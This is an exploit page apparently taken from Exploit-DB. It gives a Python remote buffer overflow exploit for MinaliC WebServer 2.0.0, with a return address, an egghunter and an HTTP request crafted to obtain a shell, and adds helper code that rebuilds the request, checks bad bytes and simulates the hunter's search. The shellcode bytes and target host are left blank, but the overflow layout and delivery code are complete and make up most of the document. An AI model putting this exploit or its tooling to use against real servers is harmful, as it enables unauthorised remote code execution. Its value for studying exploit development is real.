MinaliC WebServer 2.0.0 – Remote Buffer Overflow (Egghunter)

  • Author: PuN1sh3r
    Date: 2013-08-13
  • Category:
  • Source: https://www.exploit-db.com/exploits/27554/
#!/usr/bin/env python3
# Exploit Title: MinaliC Webserver buffer overflow (egghunter)
# Date: August 13 2013
# Exploit Author: PuN1sh3r
# Email: luiguibiker@gmail.com
# Vendor Homepage: http://minalic.sourceforge.net/
# Version: MinaliC Webserver 2.0.0
# Tested on: Windows XP Pro SP3, English
# Description:
# Remote command execution by triggering a buffer overflow in the GET
# request, plus some buffer gymnastics with an egghunter, in order to obtain a shell.
# gr33tz to superkojiman for the initial exploit
import socket

# windows/shell_bind_tcp - http://www.metasploit.com
# VERBOSE=false, LPORT=443, RHOST=, EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
# The payload bytes are not reproduced on this page; paste the generated shellcode here.
shellcode = (
    b""
)

# Return address note:
# 77C11F13   JMP EBX in msvcrt.dll, Windows XP SP3 English
ret = b"\x13\x1F\xC1\x77"
junk = b"\x41" * 245 + ret                        # 245 bytes of filler up to the saved return address
host = b"\x90" * 30 + b"A" * 40 + b"\x90" * 31    # left over from the original; not used below
# 32-byte syscall egghunter (int 0x2e): scans memory for the doubled tag "T00WT00W" and jumps past it
egg = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# Part 1: overflow in the request path, ending in the JMP EBX address
buf = b"GET /" + junk + b" HTTP/1.1\r\n"
# Part 2: NOP sled plus egghunter in the Host header (padded to exactly 100 bytes)
buf += b"Host: " + b"\x90" * (100 - len(egg)) + egg + b"\r\n"
buf += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
# Part 3: doubled egg tag, NOP sled and the shellcode in the User-Agent header (padded to 900 bytes)
buf += b"User-Agent: " + b"T00W" + b"T00W" + b"\x90" * (900 - len(shellcode)) + shellcode + b"\r\n\r\n"
print(buf)
print("[+] sending buffer size", len(buf))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 8080))    # target host is left blank on the page; fill in RHOST before running
s.send(buf)              # send/close are not shown on the page but are needed to deliver the request
s.close()
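The egghunter stage that the description above relies on, as an added example that is not part of PuN1sh3r's exploit: it rebuilds the same three-part request layout with a constructed 16-byte int3 stand-in for the Metasploit payload, pulls the egg tag out of the hunter's `mov eax, imm32`, checks each payload part for bytes that would truncate the HTTP request, and runs a small model of the hunter's search loop over the request bytes to show where the final `jmp edi` would land. The 0x00400000 base address, the set of unreadable pages and the stand-in shellcode are assumptions for illustration only; the hunter bytes and return address are the ones from the exploit.

```python
# Added example (not part of PuN1sh3r's exploit): rebuild the request layout above,
# verify the constraints the egghunter stage depends on, and model the hunter's search.

# The 32-byte syscall egghunter copied from the exploit (int 0x2e with eax=2, i.e.
# NtAccessCheckAndAuditAlarm on XP, used only to test whether a page is readable).
EGGHUNTER = bytes.fromhex(
    "6681caff0f42526a0258cd2e3c055a74efb8543030578bfaaf75eaaf75e7ffe7"
)
RET = b"\x13\x1f\xc1\x77"        # JMP EBX in msvcrt.dll, XP SP3 English (from the exploit)
NOP = b"\x90"
PAGE = 0x1000
HEADER_BAD = {0x00, 0x0a, 0x0d}                 # NUL and CR/LF break any header value
PATH_BAD = HEADER_BAD | {0x20, 0x3f, 0x23}      # space, '?' and '#' also cut the URI short


def hunter_tag(hunter=EGGHUNTER):
    """Return the 4-byte egg tag from the hunter's `mov eax, imm32` (opcode 0xB8).
    The immediate is stored little-endian, which is exactly how the tag sits in memory."""
    i = hunter.index(b"\xb8")
    return hunter[i + 1:i + 5]


def build_request(shellcode, tag=None):
    """Rebuild the exploit's three-part request: overflow + return address in the path,
    the hunter in Host, and the doubled tag + NOP sled + payload in User-Agent."""
    tag = tag or hunter_tag()
    if len(EGGHUNTER) > 100 or len(shellcode) > 900:
        raise ValueError("hunter must fit in 100 bytes and the payload in 900 bytes")
    junk = b"A" * 245 + RET
    host = NOP * (100 - len(EGGHUNTER)) + EGGHUNTER
    ua = tag * 2 + NOP * (900 - len(shellcode)) + shellcode
    return (b"GET /" + junk + b" HTTP/1.1\r\n"
            + b"Host: " + host + b"\r\n"
            + b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
            + b"User-Agent: " + ua + b"\r\n\r\n")


def bad_bytes(data, bad):
    """Set of forbidden byte values that occur in data (empty set means it is clean)."""
    return {b for b in data if b in bad}


def simulate_egghunt(memory, base, tag, unmapped=frozenset()):
    """Model the hunter's loop over a flat memory image whose first byte is at `base`.
    Unreadable pages (page-aligned addresses in `unmapped`) are skipped the way the
    `or dx,0xfff ; inc edx` prologue does; every readable address is compared against
    the doubled tag (two scasd hits) and the landing address, 8 bytes past it, is returned."""
    addr = base
    end = base + len(memory)
    while addr < end:
        if (addr & ~(PAGE - 1)) in unmapped:
            addr = (addr | (PAGE - 1)) + 1      # jump to the start of the next page
            continue
        off = addr - base
        if memory[off:off + 8] == tag * 2:
            return addr + 8                     # jmp edi: edi now points just past both tags
        addr += 1
    return None


def layout_report(shellcode):
    """Collect the checks a practitioner wants before firing the request."""
    tag = hunter_tag()
    req = build_request(shellcode, tag)
    base = 0x00400000                # assumed address of the request buffer, illustration only
    land = simulate_egghunt(req, base, tag)
    return {
        "tag": tag,
        "size": len(req),
        "path_bad": bad_bytes(b"A" * 245 + RET, PATH_BAD),
        "hunter_bad": bad_bytes(EGGHUNTER, HEADER_BAD),
        "payload_bad": bad_bytes(shellcode, HEADER_BAD),
        # the hunter must land on the NOP sled in front of the payload ...
        "lands_on_sled": land is not None and req[land - base:land - base + 4] == NOP * 4,
        # ... and must not trigger on the single copy of the tag inside its own code
        "hunter_self_match": simulate_egghunt(EGGHUNTER, base, tag) is not None,
    }


if __name__ == "__main__":
    STAND_IN = b"\xcc" * 16          # constructed int3 stand-in, not the Metasploit payload
    for k, v in layout_report(STAND_IN).items():
        print(f"{k:>18}: {v!r}")
```

The doubled tag is the whole point of the `scasd ; jne ; scasd ; jne` pair: the hunter itself carries one copy of "T00W" in its `mov eax` immediate, so a single-tag search would find the hunter and jump into it; requiring two consecutive copies makes the sled in User-Agent the only match. The bad-byte sets reflect the transport, not the target: in an HTTP request line a space, '?' or '#' ends the path early, and NUL or CR/LF ends any header value.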